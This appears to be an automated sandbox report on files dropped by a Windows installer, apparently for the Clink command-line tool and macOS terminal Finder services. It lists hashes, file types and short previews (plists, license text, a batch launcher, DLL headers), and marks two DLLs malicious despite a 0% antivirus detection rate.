                                                                                                                                                                                          Preview:<?xml version="1.0" encoding="UTF-8"?>..<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">..<plist version="1.0">..<dict>...<key>files</key>...<dict/>...<key>files2</key>...<dict>....<key>QuickLook/Thumbnail.png</key>....<dict>.....<key>hash</key>.....<data>.....tv0Qtgo8zZ9+sQPQDNdKJHm7jeQ=.....</data>.....<key>hash2</key>.....<data>.....8nlfnBbkORcam9cE84KuxM9Lgf6hYU0jehepX8sSNDU=.....</data>....</dict>....<key>document.wflow</key>....<dict>.....<key>cdhash</key>.....<data>.....VK77ipNZktBsDCcUfnfht774juM=.....</data>.....<key>requirement</key>.....<string>identifier document and anchor apple generic and certificate 1[field.1.2.840.113635.100.6.2.6] /* exists */ and certificate leaf[field.1.2.840.113635.100.6.1.13] /* exists */ and certificate leaf[subject.OU] = V4JSMC46SY</string>....</dict>...</dict>...<key>rules</key>...<dict>....<key>^Resources/</key>....<true/>....<key>^Resources/.*\.lproj/</key>....<dict>.....<key>optional</key
                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                          File Type:data
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):9042
                                                                                                                                                                                          Entropy (8bit):7.3564290051807415
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:192:izr+RjG8P03zrA/znSzrMUXFW/3rWEWp7KSrv75alZ8P09rCO:Wr+Q8GrqGrxXFwrWTOSrNab8erCO
                                                                                                                                                                                          MD5:2AE043DCE783BD866C6171A0128D8782
                                                                                                                                                                                          SHA1:8198341553D5F2F3AD14EFCDDFA359304BC49C56
                                                                                                                                                                                          SHA-256:1ED401E7A12847C8D11736C6301EB28CE30E7CD4C5A364E5E4BC37A2BA1B98C6
                                                                                                                                                                                          SHA-512:250666500FCEA4715B13F2FFCEC62262CA62D46E654DF18557B7F4A18B01F8914344C4BE4F686A2E935E04C190AF6A498A9E097F1B36BDD3A00384D12249FC3D
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:0...*.H........0....1.0...`.H.e......0...*.H...........b0...0..........z...!.0...*.H........0b1.0...U....US1.0...U....Apple Inc.1&0$..U....Apple Certification Authority1.0...U....Apple Root CA0...120201221215Z..270201221215Z0y1-0+..U...$Developer ID Certification Authority1&0$..U....Apple Certification Authority1.0...U....Apple Inc.1.0...U....US0.."0...*.H.............0.........vO.[.A.#+.._.s?.5....?.$...?.O.......>.m....G......V.)...5......`...)xEii`k_....#.:.".1O...4YB........x.3..E.Eo..Z[.:......2m..6.l....p.&..D...{...H..X..#..9~.].2_..R.@..d.[......jD.l>.&...{.^.j=G.X.1? v(m....N.i&.......N..Vt...Kfx......L.Y.........0..0...U......W....|.......-,...T0...U.......0....0...U.#..0...+.iG.v...k..@..GM..^0...U...'0%0#.!....http://crl.apple.com/root.crl0...U...........0...*.H..cd.......0...*.H.............B9tk....7*....D..,..Y..a....2..;.P9jDt..[.p..Kl.#q-_....pe........-....xXI.(.3..z..v....O......J.Vg/.>...:.wmt..#Q..o`..H...Z...FE~..'.. "ror..Pu.=%.]...6.
                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):6214
                                                                                                                                                                                          Entropy (8bit):4.808042356233671
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:96:9ys1ED/+eoxVCfSSRlG9UblpTADqnuZtJkSz:Is1EDGeoxVCfdLjRanXz
                                                                                                                                                                                          MD5:8C6AD3667294B0074F19A07D1594AB26
                                                                                                                                                                                          SHA1:841B7AEF0F650EB1CE4A6B6A71141D237D128EEC
                                                                                                                                                                                          SHA-256:C3D7487A82DFCAA325B82A237D29D1F1F67701711CD7EFA92B2A1383742ABD0C
                                                                                                                                                                                          SHA-512:BA464A226F3ED29052382F09A8C912D45395C381ACA761A1E72F63151D7059E3B304BE09D5D98689741B5633ABC76FAE7314A22C6C7E77C183AE6186D01C0176
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:<?xml version="1.0" encoding="UTF-8"?>..<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">..<plist version="1.0">..<dict>...<key>AMApplicationBuild</key>...<string>444.38</string>...<key>AMApplicationVersion</key>...<string>2.9</string>...<key>AMDocumentVersion</key>...<string>2</string>...<key>actions</key>...<array>....<dict>.....<key>action</key>.....<dict>......<key>AMAccepts</key>......<dict>.......<key>Container</key>.......<string>List</string>.......<key>Optional</key>.......<true/>.......<key>Types</key>.......<array>........<string>com.apple.cocoa.string</string>.......</array>......</dict>......<key>AMActionVersion</key>......<string>2.0.3</string>......<key>AMApplication</key>......<array>.......<string>Automator</string>......</array>......<key>AMParameterProperties</key>......<dict>.......<key>COMMAND_STRING</key>.......<dict/>.......<key>CheckedForUserDefaultShell</key>.......<dict/>.......<key>inputMethod</key>.......<
                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):802
                                                                                                                                                                                          Entropy (8bit):5.091271715917414
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:12:TMHd4+tJVEdQsv9SvS2e1XDMCnBiYlkCmak0WOtn7g4QGCkaQAHn6nEtZL7egw:2d6ysv3r1RBi1ak0Wi7HQQaqsvRw
                                                                                                                                                                                          MD5:B86FE0AA21FDBEBEAA969B16A0C35EB2
                                                                                                                                                                                          SHA1:689A5603C74F85035F9633526FA5D3B4D156FB03
                                                                                                                                                                                          SHA-256:73C360A27C552EC4C0BBA78B8E1B8179F64D2102D9D08B7AEE03874CD6C2C0AB
                                                                                                                                                                                          SHA-512:9D0BEAC7F35A4B371CDE92C19A6308437AF0C92227E438E02AE48F11299AA60ED09F26D08B5E874119E6962E1CE958E7ECDCACE82FCD23A7E151B266466CE1D8
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:<?xml version="1.0" encoding="UTF-8"?>..<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">..<plist version="1.0">..<dict>...<key>NSServices</key>...<array>....<dict>.....<key>NSBackgroundColorName</key>.....<string>background</string>.....<key>NSIconName</key>.....<string>NSActionTemplate</string>.....<key>NSMenuItem</key>.....<dict>......<key>default</key>......<string>Paste path into Tabby</string>.....</dict>.....<key>NSMessage</key>.....<string>runWorkflowAsService</string>.....<key>NSRequiredContext</key>.....<dict>......<key>NSApplicationIdentifier</key>......<string>com.apple.finder</string>.....</dict>.....<key>NSSendFileTypes</key>.....<array>......<string>public.item</string>.....</array>....</dict>...</array>..</dict>..</plist>..
                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                          File Type:PNG image data, 28 x 28, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):3730
                                                                                                                                                                                          Entropy (8bit):7.935179648465286
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:96:3uYzgziKENNlTOLOcmbUVRImS7JCUP3YMGYvoAzap:3uqKKtVbcWmS7lP38YRM
                                                                                                                                                                                          MD5:230BEC0E3D1F23A98ABFF47A25880762
                                                                                                                                                                                          SHA1:B6FD10B60A3CCD9F7EB103D00CD74A2479BB8DE4
                                                                                                                                                                                          SHA-256:F2795F9C16E439171A9BD704F382AEC4CF4B81FEA1614D237A17A95FCB123435
                                                                                                                                                                                          SHA-512:FFFAD79EDDF1198BFD43AB334EB2CF07E8C4612D1F8DFADDF5563129D381C17D4C58D8586FC3628163DEA5B3B91B4E9DE8F912CC23A0213D9C1E00E7F6166DBD
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:.PNG........IHDR.............r.....FiCCPICC Profile..H..W.TS...[RIh..H......Z........J..A.,*.v....*..Z.Y+..(..P...u.`C.M...y...3w.......;..N.O*.Cu....."CYc..Y.G..H.....K...1..@.Oy{. .........*z.......q.@..x?.x._*+......S..J<.b....b..g.q..g.q..&)...N..4.O...v3....G.....X..... ..'.8..a.........ox....9...e.bu.*!....<.....[....>.`..dQ..a.n.N.Vb.....8..!~/...!F."ET...5..9.f.........).......>3K.......H\.M..](..'j8kd....p.....m..T~..'...l..-..;...X........Sb!..).M.V.`6."N.L.....b..$2T.M.E$h.e..|.."17V...DIQ...|.*~#....v...P>6f ..0,\.;vY(I..uH.B.4s_I..5.8U....[Al*/L......T....$u.xf.oT.:........,..-.L.9@.......G"...@6....f`F.jD............F....?.j.O....-T...O ... ..V.fI....?.F..w>.5.6..:6..h4..^..%1..F."F..q.<...c.3.6w.......=......p..A.=I<O.]>,0.t@....3......^x(...!7..M....=..`...j9.............JA)C(!...gj;i{..(k.m..f..38...7...>.{Kl!..;....a..&..b..E.....?T.h.[.*.\.#...O.SYI.k.k..'.X..H.?..d.4.8[T.b._..J....]........L...a....o.@....C_u...w...:.N.....
                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                          File Type:Mac OS X Code Directory version 20200 - 168 bytes
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):168
                                                                                                                                                                                          Entropy (8bit):5.538386794634935
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:3:93tFUllNxs/lTWgSFkIKT25bxdRXdaTMGQeYQ2WT8qZEd22TTWT8qZEdn:uljxs/RW9FkNT8bxdRNm/QM2WQiEd2U/
                                                                                                                                                                                          MD5:32B4DF0B3437BBFEA6190D209EBD4284
                                                                                                                                                                                          SHA1:12204053AC58B1805B898D66574E1F9A7F5F4806
                                                                                                                                                                                          SHA-256:8F1F910BE854CD75B84E9EA641A36DC788DABC2FEC647FD64689B75079A520EA
                                                                                                                                                                                          SHA-512:38BE9650C5DE3BB46C5C724CCE53BB8055150D10447206880A54BB10701B6148800F105BBC3799BFD62FC98BCBF8126CC9A8B3B67DFBA7529CFB2607A569D731
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:.......................4...........................MPaste path into Terminus.V4JSMC46SY......m?..y...2Pr)..|.u...o/...|.Q1.$.^..Sv5j.@3...!.O|..^..Sv5j.@3...!.O|..
                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                          File Type:Mac OS X Code Requirement Set - 184 bytes
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):184
                                                                                                                                                                                          Entropy (8bit):3.7170939032012216
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:3:+9sUlB9B/lE5lFuIFkIK9wNuPRuMFxuu//ul/Ll/Uk5b/:+9sUDc1FkNRove/q/Ll/v5b/
                                                                                                                                                                                          MD5:39073BC3B08A2B71C6FA76EA8C223F56
                                                                                                                                                                                          SHA1:157CD6BF75F987F96F2F817F807C0751319624FA
                                                                                                                                                                                          SHA-256:58F23EAEC5C16935C06811C49D46AC5E38B5E1750629ACCB2092423CE24F3414
                                                                                                                                                                                          SHA-512:8A6718BFB5E21D53FF7DB94AC7C6A28149194DCE91CCA3603184C19BB5A1FA06AFFF92BFB381D48349CBAA949F037F8F5B23A992689442F571F70A7A7843EC37
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:............................................Paste path into Terminus........................*.H..cd.........................*.H..cd.....................subject.OU..........V4JSMC46SY..
                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                          File Type:Mac OS X Code Directory version 20200 - 216 bytes
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):216
                                                                                                                                                                                          Entropy (8bit):5.949799967784248
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:6:yljFjW9FkNT8boEVkbNlombptKcpJhj3i9McpJhjo:ylFjWnxboEOJlf/JJhjS9DJhjo
                                                                                                                                                                                          MD5:CD03804F94EEE247CF8287CA1FB62AFA
                                                                                                                                                                                          SHA1:370644D691968ACE290EBF8ACCCC8AAE8B3369E3
                                                                                                                                                                                          SHA-256:395146FA338C9D5061FE7778058FD20BAAE475A95A8C00917BF9682D5F98F6E0
                                                                                                                                                                                          SHA-512:280E36F244C7CE806BCB7D5001967F41108A08A8FB21A534D5752EDBF0F385C382E728AE551841D38CEF8518EA8BFBDF7D06ADE92B004D4CB1E1D12EE4F6CE47
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:.......................4............ ..............MPaste path into Terminus.V4JSMC46SY...k.0:0../.]?..~R...b..{..p.}X.>...i5.h..F.^8..u.).. .B<.O4..G.{.z._.7=.../...=.D../..Ri.M.G.{.z._.7=.../...=.D../..Ri.M
                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):2949
                                                                                                                                                                                          Entropy (8bit):5.075223870377909
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:48:c6ys/B551a2mFOyvQ75tCejztiOUH7m1yvQ7pfS1:9ysx0Qzz7+
                                                                                                                                                                                          MD5:2688E261AFB476EB303512C8629E8096
                                                                                                                                                                                          SHA1:B29804E7820C65261BD39A17868566C8C138A1F6
                                                                                                                                                                                          SHA-256:4994DAD665F60BDEED1429B30C84780EEF288DA813C6E1D56C4ACFC848C736CD
                                                                                                                                                                                          SHA-512:15914CE563D74714C7808A854CB9DCA477C4B89B3ED6C6E4820105B6ACD8B13EA8C54C43D00F334195B1566B82F42C13255CA450F6017005F9C2FDA8982CD57C
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:<?xml version="1.0" encoding="UTF-8"?>..<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">..<plist version="1.0">..<dict>...<key>files</key>...<dict/>...<key>files2</key>...<dict>....<key>QuickLook/Thumbnail.png</key>....<dict>.....<key>hash</key>.....<data>.....tv0Qtgo8zZ9+sQPQDNdKJHm7jeQ=.....</data>.....<key>hash2</key>.....<data>.....8nlfnBbkORcam9cE84KuxM9Lgf6hYU0jehepX8sSNDU=.....</data>....</dict>....<key>document.wflow</key>....<dict>.....<key>cdhash</key>.....<data>.....DwLo2M9xZ+aZGtMzRCGHhHB/wMY=.....</data>.....<key>requirement</key>.....<string>identifier document and anchor apple generic and certificate 1[field.1.2.840.113635.100.6.2.6] /* exists */ and certificate leaf[field.1.2.840.113635.100.6.1.13] /* exists */ and certificate leaf[subject.OU] = V4JSMC46SY</string>....</dict>...</dict>...<key>rules</key>...<dict>....<key>^Resources/</key>....<true/>....<key>^Resources/.*\.lproj/</key>....<dict>.....<key>optional</key
                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                          File Type:data
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):9042
                                                                                                                                                                                          Entropy (8bit):7.35643821745632
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:192:izr+RjG8P03zrA/znSzrxk6ceD13rWEWp7KSrv75alZ8P09r50poR:Wr+Q8GrqGru6drWTOSrNab8erOE
                                                                                                                                                                                          MD5:3AC2EAED0649BD0E1728BAA58E9CB27D
                                                                                                                                                                                          SHA1:5CF3957F7C924746EDF6FD15D20183E77B5B82D0
                                                                                                                                                                                          SHA-256:C1F0E27245DA212DE974FFA8B748592D5C39FA5801E3291FA34D010DD4F65772
                                                                                                                                                                                          SHA-512:AD5B82463B1B392809B3783590783C2B7085A8AF067E9F7F55D3C62F017E0163D23143EE0AEA49C6543544E3CCBFF9BD597A8EB1A33655D98EDB67EC3B8865FF
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:0...*.H........0....1.0...`.H.e......0...*.H...........b0...0..........z...!.0...*.H........0b1.0...U....US1.0...U....Apple Inc.1&0$..U....Apple Certification Authority1.0...U....Apple Root CA0...120201221215Z..270201221215Z0y1-0+..U...$Developer ID Certification Authority1&0$..U....Apple Certification Authority1.0...U....Apple Inc.1.0...U....US0.."0...*.H.............0.........vO.[.A.#+.._.s?.5....?.$...?.O.......>.m....G......V.)...5......`...)xEii`k_....#.:.".1O...4YB........x.3..E.Eo..Z[.:......2m..6.l....p.&..D...{...H..X..#..9~.].2_..R.@..d.[......jD.l>.&...{.^.j=G.X.1? v(m....N.i&.......N..Vt...Kfx......L.Y.........0..0...U......W....|.......-,...T0...U.......0....0...U.#..0...+.iG.v...k..@..GM..^0...U...'0%0#.!....http://crl.apple.com/root.crl0...U...........0...*.H..cd.......0...*.H.............B9tk....7*....D..,..Y..a....2..;.P9jDt..[.p..Kl.#q-_....pe........-....xXI.(.3..z..v....O......J.Vg/.>...:.wmt..#Q..o`..H...Z...FE~..'.. "ror..Pu.=%.]...6.
                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):6224
                                                                                                                                                                                          Entropy (8bit):4.809822124260186
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:96:9ys1ED/+eoxAfSSRlG9UblpTADqnuZtJkSz:Is1EDGeoxAfdLjRanXz
                                                                                                                                                                                          MD5:2E0DB77D7697B2BAA94FD4C9E478126C
                                                                                                                                                                                          SHA1:580119A423739A6D43DA4A24F1D447F1149F4F9F
                                                                                                                                                                                          SHA-256:19D6BD6C3A38231B5A3C67F0835CA439186BA0CE011BE6C3D1E8DE642316BADF
                                                                                                                                                                                          SHA-512:E974A5BB92D774E35DCC7FFF68153BEEEBF36DC4DC93F60ACA434C434FD813BC358C67DF89E4911FD411A3D2DFA735F30726895EAA38B3770C1033CBE2BA05A6
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:<?xml version="1.0" encoding="UTF-8"?>..<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">..<plist version="1.0">..<dict>...<key>AMApplicationBuild</key>...<string>444.38</string>...<key>AMApplicationVersion</key>...<string>2.9</string>...<key>AMDocumentVersion</key>...<string>2</string>...<key>actions</key>...<array>....<dict>.....<key>action</key>.....<dict>......<key>AMAccepts</key>......<dict>.......<key>Container</key>.......<string>List</string>.......<key>Optional</key>.......<true/>.......<key>Types</key>.......<array>........<string>com.apple.cocoa.string</string>.......</array>......</dict>......<key>AMActionVersion</key>......<string>2.0.3</string>......<key>AMApplication</key>......<array>.......<string>Automator</string>......</array>......<key>AMParameterProperties</key>......<dict>.......<key>COMMAND_STRING</key>.......<dict/>.......<key>CheckedForUserDefaultShell</key>.......<dict/>.......<key>inputMethod</key>.......<
                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (585), with CRLF line terminators
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):64732
                                                                                                                                                                                          Entropy (8bit):4.95790957286783
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:1536:EkLWZy1EAbB8fWbz9w3DVD6M8cJDYtXRaDNjvR:v1b2fWbz9wRD6M8c5YtCJvR
                                                                                                                                                                                          MD5:0EA69C6936AEBA37BF13E158CD0D9A00
                                                                                                                                                                                          SHA1:02EA7AC6DCC37ACDE7157141E931CCF1EBD94647
                                                                                                                                                                                          SHA-256:651118296E071EC26A2218E659B24549B11DFBF27DD80E8B966708AE8B361CD2
                                                                                                                                                                                          SHA-512:39C953D60FE91BCB91847C480D2E5CA997C718D85C72372CF8181BE5E8ED3ED9967170EA5FF01DD3EEEDAA383F34A408226B73026B922EC4EA8248CFE9245B73
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:# Changes....## Releases from [chrisant996/clink](https://github.com/chrisant996/clink) fork....### v1.2.9....- Added detection for possible antivirus interference when injecting Clink...- Ignore duplicate scripts paths when loading scripts...- Fixed [#118](https://github.com/chrisant996/clink/issues/118); inputrc is not read from state directory (regression introduced in v1.0.0).....### v1.2.8....- Fixed `...\` or `.../` to change directories (path separator after several dots)...- Fixed `/dirname/` to change directories (forward slashes when a directory is the only thing in the input line)...- Fixed [#114](https://github.com/chrisant996/clink/issues/114); "Clink already loaded in process" error when autorun is installed for both Current User and All Users...- Fixed [#113](https://github.com/chrisant996/clink/issues/113); forward slash translation didn't work with the `cd` command.....### v1.2.7....- Fixed [#113](https://github.com/chrisant996/clink/issues/113); `clink.slash_translati
                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):35823
                                                                                                                                                                                          Entropy (8bit):4.622190512298306
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:768:A7Y+tNdSz3ZlqXOWoInuzx3Y8N3WiYD0a:AVtNIq1uzZY17
                                                                                                                                                                                          MD5:664AA96239B59B044722945D56F70200
                                                                                                                                                                                          SHA1:05D59582038226BA83AD0F96EADA4AD92A1DECEC
                                                                                                                                                                                          SHA-256:5F631FAE467C82B8CD28FD1EC425C816895A35F9D94E36BEE0E0164570E8E0F6
                                                                                                                                                                                          SHA-512:D237E2C990F7BA11A8FBB4244C82932D24025812651B22A80E4B6A9B3DB02EBBF6A52FF8AEEF88242D3DC450AACE97E12F8C60B57F197D28A2AFEF09079F3DAD
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview: GNU GENERAL PUBLIC LICENSE.. Version 3, 29 June 2007.... Copyright (C) 2007 Free Software Foundation, Inc. <http://fsf.org/>.. Everyone is permitted to copy and distribute verbatim copies.. of this license document, but changing it is not allowed..... Preamble.... The GNU General Public License is a free, copyleft license for..software and other kinds of works..... The licenses for most software and other practical works are designed..to take away your freedom to share and change the works. By contrast,..the GNU General Public License is intended to guarantee your freedom to..share and change all versions of a program--to make sure it remains free..software for all its users. We, the Free Software Foundation, use the..GNU General Public License for most of our software; it applies also to..any other work released this way by its authors. You can apply it to..your programs, too..... When we speak of free software
                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):1499
                                                                                                                                                                                          Entropy (8bit):5.018268711106564
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:24:Bj+e4GmVLXgOsVhQ4kvpboWF4qwGuoaqCbBhBuPu1sIJFHQ64UyU:pvDmVzgT2ThboWF4qwGurRXuPuT7zyU
                                                                                                                                                                                          MD5:92F56A4F5897F221B6EEE82CD60C5EFF
                                                                                                                                                                                          SHA1:C9C89A5904B621BEFD4B16E9741AF5010E52C322
                                                                                                                                                                                          SHA-256:ACC35E35933C5388616A37750A77308DC9EA04118B9F3B9DBEEB88E795183D8F
                                                                                                                                                                                          SHA-512:7C3586332602AD3834B3727AAB033C622546CE2A3392160D9B430182A8E467BC7185E13E695FEA3A1C385EE5D06394426CDC2BAD63B5319B18F1479009F55444
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview::: Copyright (c) 2012 Martin Ridgers..:: License: http://opensource.org/licenses/MIT....@echo off..setlocal enableextensions..set clink_profile_arg=..set clink_quiet_arg=....:: Mimic cmd.exe's behaviour when starting from the start menu...if /i "%1"=="startmenu" (.. cd /d "%userprofile%".. shift..)....:: Check for the --profile option...if /i "%1"=="--profile" (.. set clink_profile_arg=--profile "%~2".. shift.. shift..)....:: Check for the --quiet option...if /i "%1"=="--quiet" (.. set clink_quiet_arg= --quiet.. shift..)....:: If the .bat is run without any arguments, then start a cmd.exe instance...if "%1"=="" (.. call :launch.. goto :end..)....:: Test for autorun...if defined CLINK_NOAUTORUN if /i "%1"=="inject" if /i "%2"=="--autorun" goto :end....:: Endlocal before inject tags the prompt...endlocal....:: Pass through to appropriate loader...if /i "%processor_architecture%"=="x86" (.. "%~dp0\clink_x86.exe" %*..) else if /i "%processor_architecture%"
                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):247
                                                                                                                                                                                          Entropy (8bit):4.2815137009524635
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:6:DVyrc9bcwkzin/IrUJx7Bl8zNgMKHbAw6n:Ar+wwUiUQ+zSMckw6
                                                                                                                                                                                          MD5:B69240707FD9F4EA6725FC3CE33D2B14
                                                                                                                                                                                          SHA1:91E2D2F75C5FFF2D590DCDF06FDBBE65370CD358
                                                                                                                                                                                          SHA-256:223A982DE36886A5A33D388837CE8A79D336559178736EED4BDCA44E330D15B4
                                                                                                                                                                                          SHA-512:CB280F26F472321905FF246243C9071F90CA6AAACABBF98AD9C5D58AFE3EB9A39033BD941EDBE7240FEF95DD97687D15E153A84CF6B4F4F1D98C1CAD16650CEC
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:-- This file is intentionally blank...--..-- The old clink.lua file is no longer used, and this blank file ensures if a..-- new clink version is copied over an old clink version, it won't accidentally..-- use an obsolete leftover clink.lua file...
                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):1838592
                                                                                                                                                                                          Entropy (8bit):6.449871061750084
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:49152:yHsyyrXGHoq8HO2AKxBwpOkyb6PrIhcffMraYa:rxrXqoqWS1ffM
                                                                                                                                                                                          MD5:4FFAA31F19440B338E62AC46E5810BC3
                                                                                                                                                                                          SHA1:C4491FFF894F40C65ED04CD7C9C43635EF0F44A3
                                                                                                                                                                                          SHA-256:FDEF73D692E2E181075BF43A05CD7EBE551F6B1BE31F4D471FF709F83A549612
                                                                                                                                                                                          SHA-512:F917D8A90E86F9542E56E8C80CDA7362BB3FEFDBBB7A094F5A518B35A74BB1394F5E7DFBC8A928A8DE7A0BC7B40D4D5E9CE7192D1207DC287C18305E8B2C7AAE
                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......B"s..C.S.C.S.C.S.1.R.C.S.1.R.C.S.1.R&C.S`,.S.C.ST6.RIC.ST6.R.C.ST6.R.C.S.1.R.C.S.C.S*B.S.6.R.C.S.6.R.C.S.6.S.C.S.6.R.C.SRich.C.S................PE..d....q.c.........." .....4..........p........................................@............`.........................................@5..`....5..........@.......\................,.. ...p.......................(.......8............P...............................text....3.......4.................. ..`.rdata.......P.......8..............@..@.data...XG...`...|...<..............@....pdata..\...........................@..@_RDATA..............................@..@.detourcp!......."..................@..@.detourd............................@....rsrc...@...........................@..@.reloc...,..........................@..B........................................................................................................
                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):1482240
                                                                                                                                                                                          Entropy (8bit):6.730944992723702
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:24576:IY9jGPXSC7NbyQDX5CXRUHlcf9oGvc0zB1J/Y00PErwq95CMqEfV3Vke9zjAP:K97g6SbS0cuw/AFn9zkP
                                                                                                                                                                                          MD5:61333C309BD818A19F686C6871700BB2
                                                                                                                                                                                          SHA1:C3EBB1ED3A178ECD866059AFA5BF7C069765877A
                                                                                                                                                                                          SHA-256:2BEB5AEE0F570E28886AB99EBE7B0E8676300859C828D14AF78DEBD8AD5B3235
                                                                                                                                                                                          SHA-512:1747971DB0D885ECE9994CA262EAEB54FBED9FADBFEA95224119C568C7B6ADC786F832AA293B908E9C5F383415A0BEB209052C0FD99F4FDAA2E8FE0B3D287508
                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......s...7..7..7................(..Q...;..e...{..e..."..e..+....$..7...............6......6.....6..Rich7..........PE..L...uq.c...........!.........R.......X....................................................@.........................@V..`....V..........@...............................p...................@.......p...@...............,............................text............................... ..`.rdata...o.......p..................@..@.data........p...J...b..............@....detourcH....`......................@..@.detourd............................@....rsrc...@...........................@..@.reloc..............................@..B................................................................................................................................................................................................................
                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):2147
                                                                                                                                                                                          Entropy (8bit):4.197234722555126
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:48:bpw45+rdlV3klke8hGyNwd2CyNwd2eyNwdfVwQG:t5mV0Olh3NwwbNww/NwdVc
